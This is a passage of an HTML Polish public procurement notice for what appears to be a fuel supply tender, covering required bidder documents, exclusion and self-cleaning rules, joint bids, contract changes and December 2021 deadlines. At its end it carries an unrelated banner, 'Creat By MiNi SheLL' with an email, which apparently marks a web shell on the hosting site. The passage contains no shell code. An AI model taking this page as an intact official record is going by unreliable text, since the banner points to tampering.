o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z późn. zm.), <br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału <br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy <br/>kapitałowej, <br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji, <br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu <br/>o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw <br/>do wykluczenia, w zakresie podstaw wykluczenia z postępowania wskazanych przez <br/>Zamawiającego, o których mowa w: <br/>- art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka zapobiegawczego, <br/>- art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami <br/>porozumienia mającego na celu zakłócenie konkurencji, <br/>- art. 108 ust. 1 pkt 6 ustawy Pzp. <br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej <br/>Polskiej, zamiast informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej – składa dokument lub dokumenty wystawione <br/>w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, <br/>że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza <br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest <br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej <br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>Dokumenty potwierdzające ww. okoliczności powinny być wystawione nie wcześniej <br/>niż 3 miesiące przed ich złożeniem. <br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się <br/>w/w dokumentów, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, <br/>o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy <br/>Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym <br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych <br/>do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod <br/>przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania <br/>nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub <br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, <br/>właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. <br/>Dokumenty potwierdzające ww. okoliczności powinny być wystawione nie wcześniej <br/>niż 3 miesiące przed ich złożeniem. <br/>2) potwierdzających spełnianie warunków udziału w postępowaniu dotyczących uprawnień <br/>do prowadzenia określonej działalności gospodarczej lub zawodowej: koncesję na obrót <br/>paliwami ciekłym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw <br/>do wykluczenia w zakresie wskazanym w SWZ składane pod rygorem nieważności <br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub <br/>podpisem osobistym, <br/>2) Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 ustawy Pzp Wykonawca nie podlega wykluczeniu, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki: <br/>a) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne; <br/>b) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem <br/>lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, <br/>aktywnie współpracując odpowiednio z właściwymi organami, w tym organami <br/>ścigania, lub zamawiającym; <br/>c) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla <br/>zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu <br/>postępowaniu, w szczególności: <br/>- zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi <br/>za nieprawidłowe postępowanie wykonawcy, <br/>- zreorganizował personel, <br/>- wdrożył system sprawozdawczości i kontroli, <br/>- utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, <br/>wewnętrznych regulacji lub standardów, <br/>- wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań <br/>za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów. <br/>Zamawiający oceni, czy podjęte przez wykonawcę czynności są wystarczające <br/>do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu <br/>wykonawcy, a jeżeli uzna, że nie są wystarczające, wykluczy wykonawcę. <br/>3) Pełnomocnictwo: <br/>a) gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, <br/>Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć <br/>do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie <br/>do złożenia oferty lub do złożenia oferty i podpisania umowy, <br/>b) w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia <br/>Wykonawcy są zobowiązani do ustanowienia pełnomocnika. Dokument <br/>pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania <br/>w postępowaniu o udzielenie zamówienia tych Wykonawców, należy załączyć <br/>do oferty. <br/>Pełnomocnictwo należy załączyć do oferty i powinno zawierać w szczególności wskazanie: <br/>- postępowania o zamówienie publiczne, którego dotyczy, <br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia <br/>wymienionych z nazwy z określeniem adresu siedziby, <br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania. <br/>4) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko <br/>jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty <br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają <br/>poszczególni Wykonawcy, <br/>5) Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych <br/>zasobów na potrzeby realizacji zamówienia w przypadku gdy Wykonawca, w celu spełnienia <br/>warunków, będzie polegał na zdolnościach technicznych lub zawodowych innych <br/>podmiotów.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z<br/>ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw <br/>do wykluczenia w zakresie wskazanym w SWZ składane pod rygorem nieważności <br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub <br/>podpisem osobistym, <br/>2) Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 ustawy Pzp Wykonawca nie podlega wykluczeniu, jeżeli udowodni zamawiającemu, że spełnił przesłanki<br/>3) Pełnomocnictwo<br/>4) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5) Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych <br/>zasobów na potrzeby realizacji zamówienia w przypadku gdy Wykonawca, w celu spełnienia <br/>warunków, będzie polegał na zdolnościach technicznych lub zawodowych innych <br/>podmiotów. <br/>6) Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty <br/>składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, Wykonawca, wraz <br/>z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane oraz <br/>wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu <br/>przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku: <br/>- Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika <br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu <br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, <br/>- wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. <br/><br/>Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko <br/>jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty <br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają <br/>poszczególni Wykonawcy, <br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać <br/>na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, <br/>do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy <br/>są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty <br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załączonym projektem umowy:<br/>8. Zamawiający dopuszcza możliwość zmiany ceny, przy zmianach cen na rynku, <br/>z zachowaniem oferowanej marży, po wykazaniu przez Wykonawcę tych zmian. <br/>9. Strony dopuszczają możliwość zmian cen jednostkowych wymienionych w ust.1 § 5 załączonej umowy w sytuacji zmian cen przez producenta bez aneksowania niniejszej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com